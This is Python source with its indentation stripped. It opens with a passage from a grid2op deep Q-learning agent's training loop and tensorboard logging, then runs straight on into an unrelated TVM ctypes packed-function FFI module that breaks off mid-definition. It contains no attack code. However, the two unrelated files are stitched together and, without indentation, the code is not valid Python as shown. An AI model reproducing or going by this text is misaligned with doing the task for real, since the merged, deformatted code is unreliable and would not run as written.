# nb_env = env.nb_env
# warnings.warn("Training using {} environments".format(nb_env))
# self.__nb_env = nb_env
self.init_obs_extraction(env.observation_space)
training_step = self._training_param.last_step
# some parameters have been move to a class named "training_param" for convenience
self.epsilon = self._training_param.initial_epsilon
# now the number of alive frames and total reward depends on the "underlying environment". It is vector instead
# of scalar
alive_frame, total_reward = self._init_global_train_loop()
reward, done = self._init_local_train_loop()
epoch_num = 0
self._losses = np.zeros(iterations)
alive_frames = np.zeros(iterations)
total_rewards = np.zeros(iterations)
new_state = None
self._reset_num = 0
self._curr_iter_env = 0
self._max_reward = env.reward_range[1]
# action types
# injection, voltage, topology, line, redispatching = action.get_types()
self.nb_injection = 0
self.nb_voltage = 0
self.nb_topology = 0
self.nb_line = 0
self.nb_redispatching = 0
self.nb_curtail = 0
self.nb_storage = 0
self.nb_do_nothing = 0
# for non uniform random sampling of the scenarios
th_size = None
self._prev_obs_num = 0
if self.__nb_env == 1:
# TODO make this available for multi env too
if _CACHE_AVAILABLE_DEEPQAGENT:
if isinstance(env.chronics_handler.real_data, MultifolderWithCache):
th_size = env.chronics_handler.real_data.cache_size
if th_size is None:
th_size = len(env.chronics_handler.real_data.subpaths)
# number of time step lived per possible scenarios
if self._time_step_lived is None or self._time_step_lived.shape[0] != th_size:
self._time_step_lived = np.zeros(th_size, dtype=np.uint64)
# number of time a given scenario has been played
if self._nb_chosen is None or self._nb_chosen.shape[0] != th_size:
self._nb_chosen = np.zeros(th_size, dtype=np.uint)
# number of time a given scenario has been played
if self._proba is None or self._proba.shape[0] != th_size:
self._proba = np.ones(th_size, dtype=np.float64)
self._prev_id = 0
# this is for the "limit the episode length" depending on your previous success
self._total_sucesses = 0
with tqdm(total=iterations - training_step, disable=not self.verbose) as pbar:
while training_step < iterations:
# reset or build the environment
initial_state = self._need_reset(env, training_step, epoch_num, done, new_state)
# Slowly decay the exploration parameter epsilon
# if self.epsilon > training_param.FINAL_EPSILON:
self.epsilon = self._training_param.get_next_epsilon(current_step=training_step)
# then we need to predict the next moves. Agents have been adapted to predict a batch of data
pm_i, pq_v, act = self._next_move(initial_state, self.epsilon, training_step)
# todo store the illegal / ambiguous / ... actions
reward, done = self._init_local_train_loop()
if self.__nb_env == 1:
# still the "hack" to have same interface between multi env and env...
# yeah it's a pain
act = act[0]
temp_observation_obj, temp_reward, temp_done, info = env.step(act)
if self.__nb_env == 1:
# dirty hack to wrap them into list
temp_observation_obj = [temp_observation_obj]
temp_reward = np.array([temp_reward], dtype=np.float32)
temp_done = np.array([temp_done], dtype=np.bool)
info = [info]
new_state = self._convert_obs_train(temp_observation_obj)
self._updage_illegal_ambiguous(training_step, info)
done, reward, total_reward, alive_frame, epoch_num \
= self._update_loop(done, temp_reward, temp_done, alive_frame, total_reward, reward, epoch_num)
# update the replay buffer
self._store_new_state(initial_state, pm_i, reward, done, new_state)
# now train the model
if not self._train_model(training_step):
# infinite loss in this case
raise RuntimeError("ERROR INFINITE LOSS")
# Save the network every 1000 iterations
if training_step % SAVING_NUM == 0 or training_step == iterations - 1:
self.save(save_path)
# save some information to tensorboard
alive_frames[epoch_num] = np.mean(alive_frame)
total_rewards[epoch_num] = np.mean(total_reward)
self._store_action_played_train(training_step, pm_i)
self._save_tensorboard(training_step, epoch_num, UPDATE_FREQ, total_rewards, alive_frames)
training_step += 1
pbar.update(1)
self.save(save_path)
# auxiliary functions
# two below function: to train with multiple environments
def _convert_obs_train(self, observations):
""" create the observations that are used for training."""
if self._obs_as_vect is None:
size_obs = self.convert_obs(observations[0]).shape[1]
self._obs_as_vect = np.zeros((self.__nb_env, size_obs), dtype=np.float32)
for i, obs in enumerate(observations):
self._obs_as_vect[i, :] = self.convert_obs(obs).reshape(-1)
return self._obs_as_vect
def _create_action_if_not_registered(self, action_int):
"""make sure that `action_int` is present in dict_action"""
if action_int not in self.dict_action:
act = self.action_space.all_actions[action_int]
is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_dn, is_curtail = \
False, False, False, False, False, False, False, False
try:
# feature unavailble in grid2op <= 0.9.2
try:
# storage introduced in grid2op 1.5.0 so if below it is not supported
is_inj, is_volt, is_topo, is_line_status, is_redisp = act.get_types()
except ValueError as exc_:
try:
is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage = act.get_types()
except ValueError as exc_:
is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_curtail = act.get_types()
is_dn = (not is_inj) and (not is_volt) and (not is_topo) and (not is_line_status) and (not is_redisp)
is_dn = is_dn and (not is_storage)
is_dn = is_dn and (not is_curtail)
except Exception as exc_:
pass
self.dict_action[action_int] = [0, act,
(is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_curtail, is_dn)]
def _store_action_played(self, action_int):
"""if activated, this function will store the action taken by the agent."""
if self.store_action:
self._create_action_if_not_registered(action_int)
self.dict_action[action_int][0] += 1
(is_inj, is_volt, is_topo, is_line_status, is_redisp, is_storage, is_curtail, is_dn) = self.dict_action[action_int][2]
if is_inj:
self.nb_injection += 1
if is_volt:
self.nb_voltage += 1
if is_topo:
self.nb_topology += 1
if is_line_status:
self.nb_line += 1
if is_redisp:
self.nb_redispatching += 1
if is_storage:
self.nb_storage += 1
self.nb_redispatching += 1
if is_curtail:
self.nb_curtail += 1
if is_dn:
self.nb_do_nothing += 1
def _convert_all_act(self, act_as_integer):
"""this function converts the action given as a list of integer. It ouputs a list of valid grid2op Action"""
res = []
for act_id in act_as_integer:
res.append(self.convert_act(act_id))
self._store_action_played(act_id)
return res
def _load_action_space(self, path):
""" load the action space in case the model is reloaded"""
if not os.path.exists(path):
raise RuntimeError("The model should be stored in \"{}\". But this appears to be empty".format(path))
try:
self.action_space.init_converter(
all_actions=os.path.join(path, "action_space.npy".format(self.name)))
except Exception as e:
raise RuntimeError("Impossible to reload converter action space with error \n{}".format(e))
# utilities for data reading
def _set_chunk(self, env, nb):
"""
to optimize the data reading process. See the official grid2op documentation for the effect of setting
the chunk size for the environment.
"""
env.set_chunk_size(int(max(100, nb)))
def _train_model(self, training_step):
"""train the deep q networks."""
self._training_param.tell_step(training_step)
if training_step > max(self._training_param.min_observation, self._training_param.minibatch_size) and \
self._training_param.do_train():
# train the model
s_batch, a_batch, r_batch, d_batch, s2_batch = self.replay_buffer.sample(self._training_param.minibatch_size)
tf_writer = None
if self.__graph_saved is False:
tf_writer = self._tf_writer
loss = self.deep_q.train(s_batch, a_batch, r_batch, d_batch, s2_batch,
tf_writer)
# save learning rate for later
if hasattr(self.deep_q._optimizer_model, "_decayed_lr"):
self.train_lr = self.deep_q._optimizer_model._decayed_lr('float32').numpy()
else:
self.train_lr = self.deep_q._optimizer_model.learning_rate.numpy()
self.__graph_saved = True
if not np.all(np.isfinite(loss)):
# if the loss is not finite i stop the learning
return False
self.deep_q.target_train()
self._losses[training_step:] = np.sum(loss)
return True
def _updage_illegal_ambiguous(self, curr_step, info):
"""update the conunt of illegal and ambiguous actions"""
tmp_ = curr_step % self._vector_size
self._illegal_actions_per_ksteps[tmp_] = np.sum([el["is_illegal"] for el in info])
self._ambiguous_actions_per_ksteps[tmp_] = np.sum([el["is_ambiguous"] for el in info])
def _store_action_played_train(self, training_step, action_id):
"""store which action were played, for tensorboard only."""
which_row = training_step % self._vector_size
self._actions_per_ksteps[which_row, :] = 0
self._actions_per_ksteps[which_row, action_id] += 1
def _fast_forward_env(self, env, time=7*24*60/5):
"""use this functio to skip some time steps when environment is reset."""
my_int = np.random.randint(0, min(time, env.chronics_handler.max_timestep()))
env.fast_forward_chronics(my_int)
def _reset_env_clean_state(self, env):
"""
reset this environment to a proper state. This should rather be integrated in grid2op. And will probably
be integrated partially starting from grid2op 1.0.0
"""
# /!\ DO NOT ATTEMPT TO MODIFY OTHERWISE IT WILL PROBABLY CRASH /!\
# /!\ THIS WILL BE PART OF THE ENVIRONMENT IN FUTURE GRID2OP RELEASE (>= 1.0.0) /!\
# AND OF COURSE USING THIS METHOD DURING THE EVALUATION IS COMPLETELY FORBIDDEN
if self.__nb_env > 1:
return
env.current_obs = None
env.env_modification = None
env._reset_maintenance()
env._reset_redispatching()
env._reset_vectors_and_timings()
_backend_action = env._backend_action_class()
_backend_action.all_changed()
env._backend_action =_backend_action
env.backend.apply_action(_backend_action)
_backend_action.reset()
*_, fail_to_start, info = env.step(env.action_space())
if fail_to_start:
# this is happening because not enough care has been taken to handle these problems
# more care will be taken when this feature will be available in grid2op directly.
raise Grid2OpException("Impossible to initialize the powergrid, the powerflow diverge at iteration 0. "
"Available information are: {}".format(info))
env._reset_vectors_and_timings()
def _need_reset(self, env, observation_num, epoch_num, done, new_state):
"""perform the proper reset of the environment"""
if self._training_param.step_increase_nb_iter is not None and \
self._training_param.step_increase_nb_iter > 0:
self._max_iter_env(min(max(self._training_param.min_iter,
self._training_param.max_iter_fun(self._total_sucesses)),
self._training_param.max_iter)) # TODO
self._curr_iter_env += 1
if new_state is None:
# it's the first ever loop
obs = env.reset()
if self.__nb_env == 1:
# still hack to have same program interface between multi env and not multi env
obs = [obs]
new_state = self._convert_obs_train(obs)
elif self.__nb_env > 1:
# in multi env this is automatically handled
pass
elif done[0]:
nb_ts_one_day = 24*60/5
if False:
# the 3-4 lines below allow to reuse the loaded dataset and continue further up in the
try:
self._reset_env_clean_state(env)
# random fast forward between now and next day
self._fast_forward_env(env, time=nb_ts_one_day)
except (StopIteration, Grid2OpException):
env.reset()
# random fast forward between now and next week
self._fast_forward_env(env, time=7*nb_ts_one_day)
# update the number of time steps it has live
ts_lived = observation_num - self._prev_obs_num
if self._time_step_lived is not None:
self._time_step_lived[self._prev_id] += ts_lived
self._prev_obs_num = observation_num
if self._training_param.oversampling_rate is not None:
# proba = np.sqrt(1. / (self._time_step_lived +1))
# # over sampling some kind of "UCB like" stuff
# # https://banditalgs.com/2016/09/18/the-upper-confidence-bound-algorithm/
# proba = 1. / (self._time_step_lived + 1)
self._proba[:] = 1. / (self._time_step_lived ** self._training_param.oversampling_rate + 1)
self._proba /= np.sum(self._proba)
_prev_id = self._prev_id
self._prev_id = None
if _CACHE_AVAILABLE_DEEPQAGENT:
if isinstance(env.chronics_handler.real_data, MultifolderWithCache):
self._prev_id = env.chronics_handler.real_data.sample_next_chronics(self._proba)
if self._prev_id is None:
self._prev_id = _prev_id + 1
self._prev_id %= self._time_step_lived.shape[0]
obs = self._reset_env(env, epoch_num)
if self._training_param.sample_one_random_action_begin is not None and \
observation_num < self._training_param.sample_one_random_action_begin:
done = True
while done:
act = env.action_space(env.action_space._sample_set_bus())
obs, reward, done, info = env.step(act)
if info["is_illegal"] or info["is_ambiguous"]:
# there are no guarantee that sampled action are legal nor perfectly
# correct.
# if that is the case, i "simply" restart the process, as if the action
# broke everything
done = True
if done:
obs = self._reset_env(env, epoch_num)
else:
if self.verbose:
print("step {}: {}".format(observation_num, act))
obs = [obs] # for compatibility with multi env...
new_state = self._convert_obs_train(obs)
return new_state
def _reset_env(self, env, epoch_num):
env.reset()
if self._nb_chosen is not None:
self._nb_chosen[self._prev_id] += 1
# random fast forward between now and next week
if self._training_param.random_sample_datetime_start is not None:
self._fast_forward_env(env, time=self._training_param.random_sample_datetime_start)
self._curr_iter_env = 0
obs = [env.current_obs]
if epoch_num % len(env.chronics_handler.real_data.subpaths) == 0:
# re shuffle the data
env.chronics_handler.shuffle(lambda x: x[np.random.choice(len(x), size=len(x), replace=False)])
return obs
def _init_replay_buffer(self):
"""create and initialized the replay buffer"""
self.replay_buffer = ReplayBuffer(self._training_param.buffer_size)
def _store_new_state(self, initial_state, predict_movement_int, reward, done, new_state):
"""store the new state in the replay buffer"""
# vectorized version of the previous code
for i_s, pm_i, reward, done, ns in zip(initial_state, predict_movement_int, reward, done, new_state):
self.replay_buffer.add(i_s,
pm_i,
reward,
done,
ns)
def _max_iter_env(self, new_max_iter):
"""update the number of maximum iteration allowed."""
self._max_iter_env_ = new_max_iter
def _next_move(self, curr_state, epsilon, training_step):
# supposes that 0 encodes for do nothing, otherwise it will NOT work (for the observer)
pm_i, pq_v, q_actions = self.deep_q.predict_movement(curr_state, epsilon, training=True)
# TODO implement the "max XXX random action per scenarios"
pm_i, pq_v = self._short_circuit_actions(training_step, pm_i, pq_v, q_actions)
act = self._convert_all_act(pm_i)
return pm_i, pq_v, act
def _short_circuit_actions(self, training_step, pm_i, pq_v, q_actions):
if self._training_param.min_observe is not None and \
training_step < self._training_param.min_observe:
# action is replaced by do nothing due to the "observe only" specification
pm_i[:] = 0
pq_v[:] = q_actions[:, 0]
return pm_i, pq_v
def _init_global_train_loop(self):
alive_frame = np.zeros(self.__nb_env, dtype=np.int)
total_reward = np.zeros(self.__nb_env, dtype=np.float32)
return alive_frame, total_reward
def _update_loop(self, done, temp_reward, temp_done, alive_frame, total_reward, reward, epoch_num):
if self.__nb_env == 1:
# force end of episode at early stage of learning
if self._curr_iter_env >= self._max_iter_env_:
temp_done[0] = True
temp_reward[0] = self._max_reward
self._total_sucesses += 1
done = temp_done
alive_frame[done] = 0
total_reward[done] = 0.
self._reset_num += np.sum(done)
if self._reset_num >= self.__nb_env:
# increase the "global epoch num" represented by "epoch_num" only when on average
# all environments are "done"
epoch_num += 1
self._reset_num = 0
total_reward[~done] += temp_reward[~done]
alive_frame[~done] += 1
return done, temp_reward, total_reward, alive_frame, epoch_num
def _init_local_train_loop(self):
# reward, done = np.zeros(self.nb_process), np.full(self.nb_process, fill_value=False, dtype=np.bool)
reward = np.zeros(self.__nb_env, dtype=np.float32)
done = np.full(self.__nb_env, fill_value=False, dtype=np.bool)
return reward, done
def _init_deep_q(self, training_param, env):
"""
This function serves as initializin the neural network.
"""
if self.deep_q is None:
self.deep_q = self._nn_archi.make_nn(training_param)
self.init_obs_extraction(env.observation_space)
def _save_tensorboard(self, step, epoch_num, UPDATE_FREQ, epoch_rewards, epoch_alive):
"""save all the informations needed in tensorboard."""
if self._tf_writer is None:
return
# Log some useful metrics every even updates
if step % UPDATE_FREQ == 0 and epoch_num > 0:
if step % (10 * UPDATE_FREQ) == 0:
# print the top k scenarios the "hardest" (ie chosen the most number of times
if self.verbose:
top_k = 10
if self._nb_chosen is not None:
array_ = np.argsort(self._nb_chosen)[-top_k:][::-1]
print("hardest scenarios\n{}".format(array_))
print("They have been chosen respectively\n{}".format(self._nb_chosen[array_]))
# print("Associated proba are\n{}".format(self._proba[array_]))
print("The number of timesteps played is\n{}".format(self._time_step_lived[array_]))
print("avg (accross all scenarios) number of timsteps played {}"
"".format(np.mean(self._time_step_lived)))
print("Time alive: {}".format(self._time_step_lived[array_] / (self._nb_chosen[array_] + 1)))
print("Avg time alive: {}".format(np.mean(self._time_step_lived / (self._nb_chosen + 1 ))))
with self._tf_writer.as_default():
last_alive = epoch_alive[(epoch_num-1)]
last_reward = epoch_rewards[(epoch_num-1)]
mean_reward = np.nanmean(epoch_rewards[:epoch_num])
mean_alive = np.nanmean(epoch_alive[:epoch_num])
mean_reward_30 = mean_reward
mean_alive_30 = mean_alive
mean_reward_100 = mean_reward
mean_alive_100 = mean_alive
tmp = self._actions_per_ksteps > 0
tmp = tmp.sum(axis=0)
nb_action_taken_last_kstep = np.sum(tmp > 0)
nb_illegal_act = np.sum(self._illegal_actions_per_ksteps)
nb_ambiguous_act = np.sum(self._ambiguous_actions_per_ksteps)
if epoch_num >= 100:
mean_reward_100 = np.nanmean(epoch_rewards[(epoch_num-100):epoch_num])
mean_alive_100 = np.nanmean(epoch_alive[(epoch_num-100):epoch_num])
if epoch_num >= 30:
mean_reward_30 = np.nanmean(epoch_rewards[(epoch_num-30):epoch_num])
mean_alive_30 = np.nanmean(epoch_alive[(epoch_num-30):epoch_num])
# to ensure "fair" comparison between single env and multi env
step_tb = step # * self.__nb_env
# if multiply by the number of env we have "trouble" with random exploration at the beginning
# because it lasts the same number of "real" steps
# show first the Mean reward and mine time alive (hence the upper case)
tf.summary.scalar("Mean_alive_30", mean_alive_30, step_tb,
description="Average number of steps (per episode) made over the last 30 "
"completed episodes")
tf.summary.scalar("Mean_reward_30", mean_reward_30, step_tb,
description="Average (final) reward obtained over the last 30 completed episodes")
# then it's alpha numerical order, hence the "z_" in front of some information
tf.summary.scalar("loss", self._losses[step], step_tb,
description="Training loss (for the last training batch)")
tf.summary.scalar("last_alive", last_alive, step_tb,
description="Final number of steps for the last complete episode")
tf.summary.scalar("last_reward", last_reward, step_tb,
description="Final reward over the last complete episode")
tf.summary.scalar("mean_reward", mean_reward, step_tb,
description="Average reward over the whole episodes played")
tf.summary.scalar("mean_alive", mean_alive, step_tb,
description="Average time alive over the whole episodes played")
tf.summary.scalar("mean_reward_100", mean_reward_100, step_tb,
description="Average number of steps (per episode) made over the last 100 "
"completed episodes")
tf.summary.scalar("mean_alive_100", mean_alive_100, step_tb,
description="Average (final) reward obtained over the last 100 completed episodes")
tf.summary.scalar("nb_different_action_taken", nb_action_taken_last_kstep, step_tb,
description="Number of different actions played the last "
"{} steps".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("nb_illegal_act", nb_illegal_act, step_tb,
description="Number of illegal actions played the last "
"{} steps".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("nb_ambiguous_act", nb_ambiguous_act, step_tb,
description="Number of ambiguous actions played the last "
"{} steps".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("nb_total_success", self._total_sucesses, step_tb,
description="Number of times the episode was completed entirely "
"(no game over)")
tf.summary.scalar("z_lr", self._train_lr, step_tb,
description="Current learning rate")
tf.summary.scalar("z_epsilon", self.epsilon, step_tb,
description="Current epsilon (from the epsilon greedy)")
tf.summary.scalar("z_max_iter", self._max_iter_env_, step_tb,
description="Maximum number of time steps before deciding a scenario "
"is over (=win)")
tf.summary.scalar("z_total_episode", epoch_num, step_tb,
description="Total number of episode played (number of \"reset\")")
self.deep_q.save_tensorboard(step_tb)
if self.store_action:
self._store_frequency_action_type(UPDATE_FREQ, step_tb)
# if self._time_step_lived is not None:
# tf.summary.histogram(
# "timestep_lived", self._time_step_lived, step=step_tb, buckets=None,
# description="Number of time steps lived for all scenarios"
# )
# if self._nb_chosen is not None:
# tf.summary.histogram(
# "nb_chosen", self._nb_chosen, step=step_tb, buckets=None,
# description="Number of times this scenarios has been played"
# )
def _store_frequency_action_type(self, UPDATE_FREQ, step_tb):
self.current_ += 1
self.current_ %= self.nb_
nb_inj, nb_volt, nb_topo, nb_line, nb_redisp, nb_storage, nb_curtail, nb_dn = self._nb_this_time[self.current_, :]
self._nb_this_time[self.current_, :] = [self.nb_injection,
self.nb_voltage,
self.nb_topology,
self.nb_line,
self.nb_redispatching,
self.nb_storage,
self.nb_curtail,
self.nb_do_nothing]
curr_inj = self.nb_injection - nb_inj
curr_volt = self.nb_voltage - nb_volt
curr_topo = self.nb_topology - nb_topo
curr_line = self.nb_line - nb_line
curr_redisp = self.nb_redispatching - nb_redisp
curr_storage = self.nb_storage - nb_storage
curr_curtail = self.nb_curtail - nb_curtail
curr_dn = self.nb_do_nothing - nb_dn
total_act_num = curr_inj + curr_volt + curr_topo + curr_line + curr_redisp + curr_dn + curr_storage
tf.summary.scalar("zz_freq_inj",
curr_inj / total_act_num,
step_tb,
description="Frequency of \"injection\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("zz_freq_voltage",
curr_volt / total_act_num,
step_tb,
description="Frequency of \"voltage\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_topo",
curr_topo / total_act_num,
step_tb,
description="Frequency of \"topo\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_line_status",
curr_line / total_act_num,
step_tb,
description="Frequency of \"line status\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_redisp",
curr_redisp / total_act_num,
step_tb,
description="Frequency of \"redispatching\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_do_nothing",
curr_dn / total_act_num,
step_tb,
description="Frequency of \"do nothing\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_storage",
curr_storage / total_act_num,
step_tb,
description="Frequency of \"storage\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_curtail",
curr_curtail / total_act_num,
step_tb,
description="Frequency of \"curtailment\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ)) | PypiClean |
/mera_tvm_host_only-1.3.1-cp36-cp36m-manylinux_2_27_x86_64.whl/tvm/_ffi/_ctypes/packed_func.py | """Function configuration API."""
import ctypes
import traceback
from numbers import Number, Integral
from ..base import _LIB, get_last_ffi_error, py2cerror, check_call
from ..base import c_str, string_types
from ..runtime_ctypes import DataType, TVMByteArray, Device, ObjectRValueRef
from . import ndarray as _nd
from .ndarray import NDArrayBase, _make_array
from .types import TVMValue, ArgTypeCode
from .types import TVMPackedCFunc, TVMCFuncFinalizer
from .types import RETURN_SWITCH, C_TO_PY_ARG_SWITCH, _wrap_arg_func, _device_to_int64
from .object import ObjectBase, PyNativeObject, _set_class_object
from . import object as _object
PackedFuncHandle = ctypes.c_void_p
ModuleHandle = ctypes.c_void_p
ObjectHandle = ctypes.c_void_p
TVMRetValueHandle = ctypes.c_void_p
def _ctypes_free_resource(rhandle):
"""callback to free resources when it is not needed."""
pyobj = ctypes.cast(rhandle, ctypes.py_object)
ctypes.pythonapi.Py_DecRef(pyobj)
# Global callback that is always alive
TVM_FREE_PYOBJ = TVMCFuncFinalizer(_ctypes_free_resource)
ctypes.pythonapi.Py_IncRef(ctypes.py_object(TVM_FREE_PYOBJ))
def _make_packed_func(handle, is_global):
"""Make a packed function class"""
obj = _CLASS_PACKED_FUNC.__new__(_CLASS_PACKED_FUNC)
obj.is_global = is_global
obj.handle = handle
return obj
def convert_to_tvm_func(pyfunc):
"""Convert a python function to TVM function
Parameters
----------
pyfunc : python function
The python function to be converted.
Returns
-------
tvmfunc: tvm.nd.Function
The converted tvm function.
"""
local_pyfunc = pyfunc
def cfun(args, type_codes, num_args, ret, _):
"""ctypes function"""
num_args = num_args.value if isinstance(num_args, ctypes.c_int) else num_args
pyargs = (C_TO_PY_ARG_SWITCH[type_codes[i]](args[i]) for i in range(num_args))
# pylint: disable=broad-except
try:
rv = local_pyfunc(*pyargs)
except Exception:
msg = traceback.format_exc()
msg = py2cerror(msg)
_LIB.TVMAPISetLastError(c_str(msg))
return -1
if rv is not None:
if isinstance(rv, tuple):
raise ValueError("PackedFunction can only support one return value")
temp_args = []
values, tcodes, _ = _make_tvm_args((rv,), temp_args)
if not isinstance(ret, TVMRetValueHandle):
ret = TVMRetValueHandle(ret)
if _LIB.TVMCFuncSetReturn(ret, values, tcodes, ctypes.c_int(1)) != 0:
raise get_last_ffi_error()
_ = temp_args
_ = rv
return 0
handle = PackedFuncHandle()
f = TVMPackedCFunc(cfun)
# NOTE: We will need to use python-api to increase ref count of the f
# TVM_FREE_PYOBJ will be called after it is no longer needed.
pyobj = ctypes.py_object(f)
ctypes.pythonapi.Py_IncRef(pyobj)
if _LIB.TVMFuncCreateFromCFunc(f, pyobj, TVM_FREE_PYOBJ, ctypes.byref(handle)) != 0:
raise get_last_ffi_error()
return _make_packed_func(handle, False)
def _make_tvm_args(args, temp_args):
"""Pack arguments into c args tvm call accept"""
num_args = len(args)
values = (TVMValue * num_args)()
type_codes = (ctypes.c_int * num_args)()
for i, arg in enumerate(args):
if isinstance(arg, ObjectBase):
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.OBJECT_HANDLE
elif arg is None:
values[i].v_handle = None
type_codes[i] = ArgTypeCode.NULL
elif isinstance(arg, NDArrayBase):
values[i].v_handle = ctypes.cast(arg.handle, ctypes.c_void_p)
type_codes[i] = (
ArgTypeCode.NDARRAY_HANDLE if not arg.is_view else ArgTypeCode.DLTENSOR_HANDLE
)
elif isinstance(arg, PyNativeObject):
values[i].v_handle = arg.__tvm_object__.handle
type_codes[i] = ArgTypeCode.OBJECT_HANDLE
elif isinstance(arg, _nd._TVM_COMPATS):
values[i].v_handle = ctypes.c_void_p(arg._tvm_handle)
type_codes[i] = arg.__class__._tvm_tcode
elif isinstance(arg, Integral):
values[i].v_int64 = arg
type_codes[i] = ArgTypeCode.INT
elif isinstance(arg, Number):
values[i].v_float64 = arg
type_codes[i] = ArgTypeCode.FLOAT
elif isinstance(arg, DataType):
values[i].v_str = c_str(str(arg))
type_codes[i] = ArgTypeCode.STR
elif isinstance(arg, Device):
values[i].v_int64 = _device_to_int64(arg)
type_codes[i] = ArgTypeCode.DLDEVICE
elif isinstance(arg, (bytearray, bytes)):
# from_buffer only taeks in bytearray.
if isinstance(arg, bytes):
byte_arr = bytearray(arg)
temp_args.append(byte_arr)
arg = byte_arr
arr = TVMByteArray()
arr.data = ctypes.cast(
(ctypes.c_byte * len(arg)).from_buffer(arg), ctypes.POINTER(ctypes.c_byte)
)
arr.size = len(arg)
values[i].v_handle = ctypes.c_void_p(ctypes.addressof(arr))
temp_args.append(arr)
type_codes[i] = ArgTypeCode.BYTES
elif isinstance(arg, string_types):
values[i].v_str = c_str(arg)
type_codes[i] = ArgTypeCode.STR
elif isinstance(arg, (list, tuple, dict, _CLASS_OBJECT_GENERIC)):
arg = _FUNC_CONVERT_TO_OBJECT(arg)
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.OBJECT_HANDLE
temp_args.append(arg)
elif isinstance(arg, _CLASS_MODULE):
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.MODULE_HANDLE
elif isinstance(arg, PackedFuncBase):
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.PACKED_FUNC_HANDLE
elif isinstance(arg, ctypes.c_void_p):
values[i].v_handle = arg
type_codes[i] = ArgTypeCode.HANDLE
elif isinstance(arg, ObjectRValueRef):
values[i].v_handle = ctypes.cast(ctypes.byref(arg.obj.handle), ctypes.c_void_p)
type_codes[i] = ArgTypeCode.OBJECT_RVALUE_REF_ARG
elif callable(arg):
arg = convert_to_tvm_func(arg)
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.PACKED_FUNC_HANDLE
temp_args.append(arg)
else:
raise TypeError("Don't know how to handle type %s" % type(arg))
return values, type_codes, num_args
class PackedFuncBase(object):
"""Function base."""
__slots__ = ["handle", "is_global"]
# pylint: disable=no-member
def __init__(self, handle, is_global):
"""Initialize the function with handle
Parameters
----------
handle : PackedFuncHandle
the handle to the underlying function.
is_global : bool
Whether this is a global function in python
"""
self.handle = handle
self.is_global = is_global
def __del__(self):
if not self.is_global and _LIB is not None:
if _LIB.TVMFuncFree(self.handle) != 0:
raise get_last_ffi_error()
def __call__(self, *args):
"""Call the function with positional arguments
args : list
The positional arguments to the function call.
"""
temp_args = []
values, tcodes, num_args = _make_tvm_args(args, temp_args)
ret_val = TVMValue()
ret_tcode = ctypes.c_int()
if (
_LIB.TVMFuncCall(
self.handle,
values,
tcodes,
ctypes.c_int(num_args),
ctypes.byref(ret_val),
ctypes.byref(ret_tcode),
)
!= 0
):
raise get_last_ffi_error()
_ = temp_args
_ = args
return RETURN_SWITCH[ret_tcode.value](ret_val)
def __init_handle_by_constructor__(fconstructor, args):
"""Initialize handle by constructor"""
temp_args = []
values, tcodes, num_args = _make_tvm_args(args, temp_args)
ret_val = TVMValue()
ret_tcode = ctypes.c_int()
if (
_LIB.TVMFuncCall(
fconstructor.handle,
values,
tcodes,
ctypes.c_int(num_args),
ctypes.byref(ret_val),
ctypes.byref(ret_tcode),
)
!= 0
):
raise get_last_ffi_error()
_ = temp_args
_ = args
assert ret_tcode.value == ArgTypeCode.OBJECT_HANDLE
handle = ret_val.v_handle
return handle
def _return_module(x):
"""Return function"""
handle = x.v_handle
if not isinstance(handle, ModuleHandle):
handle = ModuleHandle(handle)
return _CLASS_MODULE(handle)
def _handle_return_func(x):
"""Return function"""
handle = x.v_handle
if not isinstance(handle, PackedFuncHandle):
handle = PackedFuncHandle(handle)
return _CLASS_PACKED_FUNC(handle, False)
def _get_global_func(name, allow_missing=False):
handle = PackedFuncHandle()
check_call(_LIB.TVMFuncGetGlobal(c_str(name), ctypes.byref(handle)))
if handle.value:
return _make_packed_func(handle, False)
if allow_missing:
return None
raise ValueError("Cannot find global function %s" % name)
# setup return handle for function type
_object.__init_by_constructor__ = __init_handle_by_constructor__
RETURN_SWITCH[ArgTypeCode.PACKED_FUNC_HANDLE] = _handle_return_func
RETURN_SWITCH[ArgTypeCode.MODULE_HANDLE] = _return_module
RETURN_SWITCH[ArgTypeCode.NDARRAY_HANDLE] = lambda x: _make_array(x.v_handle, False, True)
C_TO_PY_ARG_SWITCH[ArgTypeCode.PACKED_FUNC_HANDLE] = _wrap_arg_func(
_handle_return_func, ArgTypeCode.PACKED_FUNC_HANDLE
)
C_TO_PY_ARG_SWITCH[ArgTypeCode.MODULE_HANDLE] = _wrap_arg_func(
_return_module, ArgTypeCode.MODULE_HANDLE
)
C_TO_PY_ARG_SWITCH[ArgTypeCode.DLTENSOR_HANDLE] = lambda x: _make_array(x.v_handle, True, False)
C_TO_PY_ARG_SWITCH[ArgTypeCode.NDARRAY_HANDLE] = _wrap_arg_func(
lambda x: _make_array(x.v_handle, False, True), ArgTypeCode.NDARRAY_HANDLE
)
_CLASS_MODULE = None
_CLASS_PACKED_FUNC = None
_CLASS_OBJECT_GENERIC = None
_FUNC_CONVERT_TO_OBJECT = None
def _set_class_module(module_class):
"""Initialize the module."""
global _CLASS_MODULE
_CLASS_MODULE = module_class
def _set_class_packed_func(packed_func_class):
